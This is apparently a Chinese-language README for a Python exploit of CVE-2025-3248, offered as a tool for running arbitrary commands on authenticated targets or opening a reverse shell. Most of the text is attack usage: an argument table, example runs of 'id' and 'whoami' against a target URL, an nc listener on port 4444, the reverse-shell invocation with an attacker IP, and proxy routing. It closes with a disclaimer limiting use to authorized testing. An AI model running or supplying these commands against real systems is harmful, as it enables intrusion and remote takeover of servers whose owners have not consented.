
此 Python 脚本利用 CVE-2025-3248 在易受攻击的系统上执行任意命令或弹出一个反向 Shell。使用此漏洞利用程序需要进行身份验证。
该 Python 脚本利用 CVE-2025-3248 在易受攻击的系统上执行任意命令或生成反向 shell。 使用此漏洞利用需要身份认证。
requests 库使用以下命令安装依赖:
pip install requests
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]
| 参数 | 描述 | 是否必需 |
|---|---|---|
-u, --url | 目标基础 URL(例如 https://target.com) | 是 |
-l, --login | 管理员用户名 | 是 |
-p, --password | 管理员密码 | 是 |
-c, --command | 要在目标上执行的命令 | 否* |
--proxy | 代理 URL(例如 http://127.0.0.1:8080) | 否 |
--lhost | 反向 shell 的本地主机 | 否* |
--lport | 反向 shell 的本地端口 | 否* |
* 你必须指定一个命令(-c),或者同时指定 --lhost 和 --lport 以获得反向 shell。
python3 exploit.py -u https://target.com -l admin -p password -c "id"
在你的机器上启动一个监听器:
nc -lvnp 4444
然后运行:
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080
你可以使用以下命令部署 Docker 镜像:
podman compose up -d
该镜像将在 http://localhost:7860 可用。
compose 文件致谢:此仓库
此脚本仅用于教育和授权渗透测试目的。 禁止对你不拥有或未经明确许可测试的系统使用。
本 README 由 AI 生成。